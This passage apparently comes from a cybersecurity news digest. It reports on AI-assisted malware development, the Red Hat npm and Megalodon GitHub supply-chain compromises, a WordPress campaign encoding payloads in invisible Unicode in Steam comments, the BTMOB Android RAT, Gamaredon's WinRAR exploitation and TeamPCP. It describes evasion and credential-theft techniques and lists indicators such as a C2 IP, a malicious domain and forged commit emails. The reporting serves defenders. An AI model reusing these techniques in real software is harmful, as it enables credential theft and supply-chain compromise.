The malware was evaluated in laboratory environments against security products from Sophos, CrowdStrike, and Microsoft. Researchers noted that repeated testing and revision cycles appeared to improve the success rate of many payloads. However, they also observed inconsistencies between some reported results and actual testing outcomes, leaving questions about the accuracy of certain internal performance claims.

Despite the extensive use of artificial intelligence during development, Sophos found no indication that AI was embedded within deployed malware or operating independently on victim systems. The technology was primarily used to accelerate the research, testing, and refinement process while human operators remained responsible for directing the activity.

The findings provide another example of how threat actors are incorporating AI into existing workflows. Rather than introducing entirely new attack methods, these tools appear to be helping attackers shorten the time needed to transform publicly available security research into functioning malware capable of challenging modern security defenses.

Red Hat Investigates npm Package Compromise After Malware Found in Official Repository

 



Security researchers have identified malicious code in dozens of packages distributed through Red Hat's official @redhat-cloud-services namespace on npm after attackers gained unauthorized access to the repository.

The incident was first reported by researchers at Aikido Security, who found that software packages published through the trusted Red Hat namespace had been modified to include malware capable of collecting credentials from developer environments. Because the affected namespace is used for legitimate Red Hat cloud-related packages, developers may have installed the compromised versions without suspecting unauthorized changes.

According to researchers, more than 30 package versions were affected. Several remained available for download when the activity was initially disclosed, creating a risk for organizations that automatically pull dependencies into development workflows.

Technical analysis showed that the malicious code was designed to run during package installation. This means exposure could occur as soon as a package is installed, even if the software itself is never executed inside an application.

Researchers found that the malware searched infected systems for authentication data commonly used by developers and cloud administrators. The targeted information reportedly included GitHub Actions secrets, npm access tokens, Kubernetes credentials, Vault secrets, and other cloud-service authentication material that could provide access to source code repositories, deployment environments, and internal infrastructure.

The malware also contained mechanisms intended to expand the compromise beyond the initial victim. If credentials with sufficient privileges were discovered, the malicious code could attempt to publish altered packages through repositories or accounts available to the infected environment. This behavior could allow attackers to use one compromised system as a stepping stone into additional software projects.

Investigators further observed that stolen information was encrypted before being transmitted from infected systems. Reports indicate that the malware included backup methods for data exfiltration, including the ability to use compromised GitHub repositories if its primary communication channel became unavailable.

Researchers noted signs that the incident may have involved CI/CD infrastructure. Continuous Integration and Continuous Delivery systems automate software building, testing, and deployment, making them attractive targets because a compromise can provide access to multiple projects simultaneously. Evidence reviewed by researchers suggested that GitHub Actions OpenID Connect workflows may have been involved in publishing the affected packages.

The exact method used to gain access to the Red Hat namespace remains under investigation. Researchers have not publicly attributed the initial compromise to a specific technique, although they believe unauthorized access to publishing credentials likely played a role.

Security firms examining the incident linked the malware to a variant of "Shai-Hulud," a credential-stealing program that has appeared in recent software supply-chain investigations. Researchers noted that code associated with the malware has circulated publicly, increasing the likelihood that similar attacks could be adopted by multiple threat actors.

Following notification of the issue, Red Hat removed the affected packages and began an internal investigation. In a public statement, the company said the compromised packages were intended for internal development purposes and were not distributed to customers through Red Hat production services. The company also stated that it had not identified evidence of impact to customer environments, partner systems, or production infrastructure at the time of its investigation.

Security experts recommend that any organization or developer who installed affected package versions review their systems immediately. Response measures should include rotating credentials, examining CI/CD environments for unauthorized activity, reviewing repository permissions, and checking software dependencies for indicators associated with the compromise.

The incident illustrates a recurring challenge in modern software development: trust placed in widely used package repositories can become a point of failure when an attacker gains access to a legitimate publishing channel. When that occurs, malicious code can reach downstream users through routine software updates rather than through traditional intrusion methods. 

WordPress Malware Campaign Hides Payloads in Steam Profiles

 

WordPress malware campaign hides payloads in Steam profiles, marking one of the most unconventional cyberattacks in recent security history. Nearly 2,000 WordPress websites were infected with malware that relies on Steam Community profile comments to hide command-and-control data, according to GoDaddy security engineers who uncovered the campaign. This bizarre attack chain demonstrates how threat actors increasingly exploit legitimate platforms to evade traditional detection methods. 

The technical sophistication lies in how the malware uses invisible Unicode characters to encode its payload. The threat actor uses six specific invisible Unicode characters: Zero-width non-joiner (U+200C), Zero-width joiner (U+200D), Function application (U+2061), Invisible times (U+2062), Invisible separator (U+2063), and Invisible plus (U+2064). The decoder ignores visible characters and maps invisible ones to corresponding numbers, then converts them to binary representation to reconstruct bytes. This encoding allows binary data to embed within normal-looking text, with visible characters serving as camouflage while invisible characters carry the actual payload. 

Since the campaign was first uncovered in July 2025, researchers have found malware on approximately 1,980 WordPress websites, though the initial infection vector remains unclear. Attackers likely breached websites through stolen admin logins, compromised FTP/SFTP credentials, vulnerable WordPress themes or plugins, or supply-chain compromises. The first-stage malware uses WordPress page loads to reach specific Steam profiles and extract text from benign-looking comments that sometimes include ASCII art disguised malicious text. The decoded payload builds a hello-mywordl[.]info URL serving JavaScript code injected into every frontend WordPress page. 

GoDaddy describes several evasion mechanisms including obfuscated strings using octal and hex escapes, randomized function names, fake disabled logging code, and standard WordPress APIs that blend with normal activity. The campaign pairs this encoding with a server-side backdoor enabling attackers to remotely rewrite any plugin or theme file using a simple POST request with the right cookie, meaning even removed injected scripts can reinstall. This dual approach makes the malware particularly persistent and difficult to eliminate completely. 

Site owners can defend by checking for Steam Community URL references, suspicious external JavaScript injections, outbound connections from WordPress servers to Steam, and unexpected scripts loading from domains like hello-mywordl[.]info. Other indicators include invisible Unicode characters, suspicious transient_caption cache entries, disabled SSL verification in cURL requests, and POST requests containing malware authentication cookies or the new_code parameter. This attack underscores the importance of monitoring unusual outbound connections and implementing comprehensive security scanning for invisible character anomalies in web content.

Researchers Uncover BTMOB Malware Capable of Taking Over Android Phones


 

In the Android threat landscape, a new malware operation has been rapidly expanding, reducing the barriers to entry for cybercriminals while simultaneously enhancing their offensive capabilities significantly. Security researchers have identified BTMOB, an Android remote access trojan (RAT) derived from the SpySolr malware family, as an emerging malware-as-a-service platform that enables operators to remotely monitor, manipulate, and control compromised devices with minimal technical expertise. 

Malware primarily distributes itself through phishing campaigns and fraudulent applications masquerading as legitimate online services, combining extensive device takeover functionality with a no-code campaign-building framework, which facilitates the customisation of lures, automatic deployment, and targeting of multiple regions using the malware.

BTMOB's evolution reflects a broader shift in the mobile threat landscape, where commercially packaged malware platforms are transforming advanced Android attack capabilities into scalable cybercrime services available to a wider range of threat actors.  As malware's commercialisation model increases, its reach is closely linked. In contrast to being operated by a single threat group, BTMOB serves as a subscription-based cybercrime service with public-facing marketing channels for the purpose of attracting potential customers. 

The malware is marketed through a dedicated surface-web portal that directs buyers to a Telegram-based operator. Additional marketing is conducted via social media accounts on X and Instagram. The commercialisation of the malware provides valuable insight into how its operators have transformed a technical threat into a structured cybercrime service designed for scale. 

Access to the platform has reportedly been advertised for approximately $5,000, along with recurring support fees. Researchers note that the cost remains relatively low compared with the potential returns from successful fraud operations, making the service attractive to a broader range of cybercriminals. Further aggravating the risks is the fact that the malware is circulated outside the commercial ecosystem. 

BTMOB-related files appeared briefly on a dark web forum in January of 2026 as a free download before disappearing, showing how malware distributed through commercial channels can rapidly spread through unauthorised sharing and reselling networks. Consequently, security teams are faced with an increasingly dynamic threat, as new builds and modified payloads emerge more rapidly than traditional detection mechanisms can react. 

Beyond its commercial appeal, BTMOB's effectiveness ultimately depends on its ability to compromise devices at scale through carefully crafted social engineering campaigns. In order to achieve operational success, BTMOB will continue to rely heavily on phishing-driven infection chains designed to maximize the trust of the user base. 

The threat actors often redirect targets to counterfeit websites masquerading as streaming platforms, cryptocurrency services, or other widely recognised online brands in order to divert them to fraudulent application repositories containing malicious Android applications. Additionally, attacks have been observed that are tailored to align with local institutions and government entities, including operations impersonating Argentine tax and public sector agencies as lures. 

Upon sideloading, the malware seeks elevated privileges by exploiting Android's Accessibility Services, giving it the ability to silently grant it additional permissions without the user having to take any further action. The BTMOB establishes communication with attacker-controlled command-and-control infrastructure with these privileges, allowing the operator to remotely manage the compromised device and maintain persistent access in order to monitor, steal credentials, and conduct other malicious activities on the compromised device. A significant challenge for defenders is the commercial framework underpinning BTMOB.

A report by security researchers indicates that the malware's pricing structure includes a lifetime license that costs approximately $5,000 plus recurring support fees, which are relatively modest expenditures when compared to the potential financial gains that could be realized from successful credential theft and fraud. These economic factors have accelerated the malware's adoption across underground communities, expanding its operational reach beyond highly skilled threat actors.

In January 2026, a dark web forum briefly advertised BTMOB-related files as free downloads before going offline. The incident illustrates how commercially distributed malware can quickly spread beyond its intended customer base through resale networks, private exchanges, and closed underground communities. 

It is quite possible that competitors can replicate the successful design elements of the original malware by borrowing campaign management features and payload customisation mechanisms that facilitate large-scale operations even where the original malware is inaccessible. This combination of rapid distribution and continuous modification creates additional challenges for defenders attempting to track the malware's evolution. As a result, defenders face an increasingly fluid threat environment in which payloads, infrastructure, and delivery techniques can change faster than conventional detection strategies can adapt.

ESET currently identifies MSIL/BtmobRat as the primary malware framework, while associated Android variants have been detected under several classifications, including Android/Spy.Agent.EED, Android/Spy.Agent.EIJ, and Android/Spy.Agent.EIK. As a result of its rapid development, the pace of development has already demonstrated its capacity for rapid evolution; a Cyble analysis of February 2025 observed the emergence of approximately fifteen distinct samples of BTMOB v2.5 within a relatively short timeframe. 

Behavioural monitoring and continuous threat intelligence correlation become increasingly critical with such turnover, which complicates traditional signature-based detection efforts. As BTMOB is predominantly driven by social engineering and the installation of unauthorised applications, security experts emphasise the importance of preventive measures. 

As a precautionary measure, organisations should implement policies which limit software installation to trusted application repositories, as well as educate users about the risks associated with unsolicited links received via email, messaging platforms, social media platforms, and online advertisements. In order to ensure the security of mobile devices is as high as that of workstations and servers, dedicated mobile threat defence solutions must be deployed. 

Additionally, researchers warn that one unauthorised application installed on a corporate device may create a pathway to sensitive business information. Employee awareness is a critical component of organisational resilience in the face of cybersecurity threats. It is important to note that, despite BTMOB's rapid mutation, static indicators of compromise remain useful signals for incident response teams conducting threat hunting and compromise assessments despite the rapid mutation of the BTMOB system. 

BTMOB highlights the continued evolution of cybercrime from isolated malware campaigns to commercially supported attack platforms capable of scaling sophisticated Android intrusions. As mobile threats become easier to acquire, customise, and deploy, organisations can no longer treat smartphones as secondary assets within their security programs. Strong application controls, user awareness, and continuous monitoring remain essential for reducing exposure to increasingly adaptable mobile threats.

GTA 6 Pre-Order Hype Triggers Wave of Scams and Malware Attacks on Fans

 

The excitement around Grand Theft Auto 6 is creating a fresh opportunity for online scammers and hackers. As users search for pre-order news, fake offers are beginning to appear across websites, social platforms, and shady download pages, all designed to steal money or personal data. Mashable reports that the hype has already become a magnet for criminal activity, especially as rumors about pre-orders spread and players rush to secure a copy early. 

One of the biggest dangers is the rise of fake pre-order listings. Cybercriminals are posting bogus sales pages that promise early access, special bonuses, or limited-edition copies, even though official pre-orders have not been widely launched yet. Some of these scams try to look legitimate by copying retailer branding or using familiar game-related language, but they often ask for payment details, email addresses, or account logins before any real product exists. 

Security researchers have also found more aggressive threats tied to GTA 6 enthusiasm. According to NordVPN-related reporting, attackers are using fake beta-test invitations, malware-laced installers, cloned Android apps, and phishing pages that imitate Rockstar Social Club login screens. In some cases, these files are not games at all but tools for stealing credentials, tracking victims, or pushing adware and subscription traps. That means the risk is not just losing money; it can also involve infected devices and compromised accounts. 

Safety tips 

The clearest defense is to wait for official announcements from Rockstar and major retailers such as PlayStation, Xbox, Best Buy, Walmart, Amazon, or the Rockstar Store before paying for anything. Third-party sellers claiming to have pre-orders, beta keys, or early access are a major red flag, especially if they ask for payment before Rockstar has confirmed availability. If a page offers a price that seems random, a download that sounds too early, or a “verification” step that leads to more forms or apps, it is best to leave immediately. 

For users, the best rule is simple: excitement should not replace caution. Check the source, avoid unofficial links, and never install files or enter passwords from unverified GTA 6 pages. Until the real pre-order window opens, patience is safer than chasing a deal that could end in theft, malware, or both.

Russian State-sponsored Hackers Attack Ukraine, Exploit WinRAR to Install Malware


The Russian Hacking group called Gamaredon has been linked to the constant hack of a WinRar bug to install a few malware strains aiming to propagate and steal data.

According to Sekoia, the attack consists of exploiting the bug CVE-2025-8088, a path traversal bug in WinRAR, to run an HTML App payload called GammaPhish, which is later used to get a VBScript payload from the C2 server. The main goal is to fingerprint the host device and update the network settings in the registry via dead drop resolvers (DDRs), retrieve and launch arbitrary VBScript payloads from the C2 servers.

About the malware

“Gamaredon’s arsenal has undergone a significant transformation over the last decade, transitioning from Pteranodon custom-built framework into a fragmented and modular malware. Based on our observation, today’s Gamaredon capacities are characterised by a proliferation and a highly active development cycle of new malware variants,” said Sekoia

Payloads attacking VBS

One payload is a VBScript worm called GammaWorm that builds persistence through scheduled tasks and is built to hide authentic directories in network shares and USB drives and replace with infected Windows Shortcut (LNK) files. This causes the launch of arbitrary code gotten from a C2 server.

To fix C2,  GammaWorm starts a GET request to the public Telegram channel. Via genuine platforms such as Telegram, hackers blend with regular traffic, escape getting caught, and launch long-term spying campaigns. GammaWorm also depends on NTFS Alternate Data Streams (ADS) tactics to hide its core modules.

Other malware strains

A different malware family deployed through GammaLoad is a modular information stealer called GammaSteel that stores files matching particular extensions and retrieves the stolen files on AWS S3 bucket or a threat-actor regulated server as a backup option. According to Sekoia, the infection chain could be used to launch different malware strains like GammaWipe or GamaWiper, this depends on the hacker’s targets. 

"The exact deployment vector for GammaWorm remains ambiguous; it could be dropped concurrently by GammaLoad, or introduced independently via a user executing a weaponized USB drive," it noted. "In addition, assessing the global execution flow, we assess with high confidence that GammaPhish is designed to deploy GammaLoad first,” Sekoia said.

State-sponsored hackers involved

Russian state-sponsored actor Gamaredon associated with the official Federal Security Service (FSB) has a long history of targeting Ukraine and its government, critical infrastructures, military via spear-phishing emails that consist infected attachments in “booby-trapped RAR archives”, according to the Hacker News.

Gamaredon, a Russian state-sponsored intrusion-set officially linked to the Federal Security Service (FSB), has a history of targeting Ukraine, particularly government, military, and critical infrastructure entities, using spear-phishing emails containing malicious attachments, in this booby-trapped RAR archives.

Megalodon Malware Backdoors 5,500+ GitHub Repos in 6-Hour Supply-Chain Attack

 

On May 18, 2026, a massive automated supply-chain attack codenamed Megalodon struck GitHub, injecting malicious CI/CD backdoors into more than 5,500 repositories in under six hours. Security firm SafeDep discovered the campaign, which pushed 5,718 malicious commits to 5,561 distinct repositories using throwaway accounts with randomized eight-character usernames, marking one of the most aggressive GitHub Actions poisoning campaigns ever recorded. 

The attackers forged bot-like author identities—build-bot, auto-ci, ci-bot, and pipeline-bot—using emails build-system@noreply.dev and ci-bot@automated.dev to mimic routine automated CI maintenance. Between approximately 11:36 and 17:48 UTC on May 18, these fake commits slipped into repositories without triggering immediate suspicion, as they appeared to be ordinary build optimization updates. 

Megalodon deployed two distinct GitHub Actions workflow variants sharing the same command-and-control server at 216.126.225.129:8443. The SysDiag variant added a new ci.yml file triggering on every push and pull_request_target, ensuring automated execution on any commit across all branches. The Optimize-Build variant replaced existing workflows with a workflow_dispatch trigger, creating a dormant backdoor that attackers can silently activate on demand via the GitHub API, producing zero visible CI runs and no failed builds. 

The base64-encoded 111-line bash payload conducted aggressive credential harvesting, exfiltrating all CI environment variables, AWS credentials, GCP access tokens, Azure credentials, SSH private keys, Docker and Kubernetes configurations, API keys, database connection strings, GitHub Actions tokens, GitLab CI/CD tokens, and dozens of other secrets while scanning source code for more than 30 secret regex patterns. 

The attack's most critical downstream impact targeted Tiledesk, an open-source live chat platform, where the attacker compromised the repository and replaced the legitimate Docker build workflow. The unsuspecting maintainer published @tiledesk/tiledesk-server versions 2.18.6 through 2.18.12 to npm, propagating the backdoor to the package registry. Organizations should immediately revert malicious commits from build-system@noreply.dev or ci-bot@automated.dev, rotate all secrets, audit cloud logs for anomalous OIDC requests, check Actions tabs for unexpected workflow_dispatch executions, and pin GitHub Actions to specific commit SHAs.

TeamPCP’s Supply Chain Campaign Raises Fresh Concerns Over Open-Source Software Security

 



A cybercrime group known as TeamPCP has been linked to an expanding series of software supply chain attacks that researchers say have affected hundreds of organizations, with GitHub becoming the latest high-profile name connected to the campaign.

GitHub recently disclosed that it had identified thousands of repositories impacted after a developer reportedly installed a compromised extension for Visual Studio Code (VSCode), Microsoft's widely used source-code editor. TeamPCP later claimed on the cybercrime forum BreachForums that it had gained access to roughly 4,000 GitHub repositories and attempted to advertise what it described as GitHub source code and internal organizational data for sale. GitHub stated that it had identified at least 3,800 affected repositories but said its investigation indicated the exposed repositories contained the company's own code rather than customer code.

The incident highlights the growing danger of software supply chain attacks. Unlike traditional intrusions that target a company directly, these operations focus on software that developers trust and use every day. By secretly inserting malicious code into legitimate tools, attackers can potentially reach thousands of downstream users through a single compromise.

Security researchers tracking TeamPCP believe the group has transformed what was once considered an occasional cybersecurity threat into a recurring problem. According to software supply chain security firm Socket, the group has launched around 20 separate attack waves in recent months, embedding malicious code into more than 500 unique software projects. When different compromised versions are counted, that number rises to well over a thousand malicious releases.

Researchers say the group's success stems from a self-reinforcing attack cycle. TeamPCP typically begins by compromising a development environment associated with an open-source project. Malware is then inserted into software packages that are downloaded by other developers. Once installed, the malicious code can steal credentials, authentication tokens, and publishing permissions, allowing attackers to compromise additional software projects and continue spreading through the development ecosystem.

Recent investigations indicate that TeamPCP has increasingly automated this process through a worm known as Mini Shai-Hulud. The malware has been observed creating GitHub repositories containing encrypted credentials stolen from victims while leaving references to Frank Herbert's science-fiction universe Dune. Researchers note that although the name resembles an earlier worm called Shai-Hulud, there is currently no evidence linking TeamPCP to that previous campaign.

GitHub is not the only organization mentioned in connection with the operation. Researchers have previously linked TeamPCP activity to incidents involving OpenAI, Mercor, and several widely used software development projects. During a major expansion of its campaign earlier this year, the group reportedly compromised software and infrastructure associated with Trivy, LiteLLM, Checkmarx, pgserve, TanStack, and Mistral AI. The stolen credentials obtained through those attacks were allegedly used to fuel further compromises.

Security analysts describe credential theft as the group's primary enabler. Long-lived access tokens and poorly managed credentials allow attackers to move from one environment to another with relatively little effort. According to researchers, once a single trusted credential is stolen, it can provide access to additional repositories, cloud resources, and development systems.

The group's activities have also evolved beyond software tampering. Threat intelligence researchers report that TeamPCP has engaged in ransomware deployment, data extortion, and data-sale operations. In April, the group reportedly began adopting elements of a ransomware-as-a-service model through associations with cybercriminal platforms such as BreachForums and DragonForce. Researchers have additionally observed activity involving CanisterWorm, malware that targeted Kubernetes environments and reportedly deployed destructive functionality against selected Iranian targets.

The scale of the campaign has renewed debate over how organizations should safely consume open-source software. Experts recommend strengthening credential management practices, regularly rotating access tokens, limiting permissions wherever possible, and closely monitoring software dependencies. They also advise organizations to avoid automatically installing newly released software updates without first validating their integrity. In some recent cases, security teams detected malicious updates within minutes, but users who relied on automatic updates had already installed the compromised code.

The bigger lesson, researchers say, is that trust alone is no longer sufficient in modern software development. Open-source software remains a cornerstone of the global technology ecosystem, but organizations increasingly need verification processes, update review procedures, and continuous monitoring to reduce the risk posed by rapidly spreading supply chain attacks.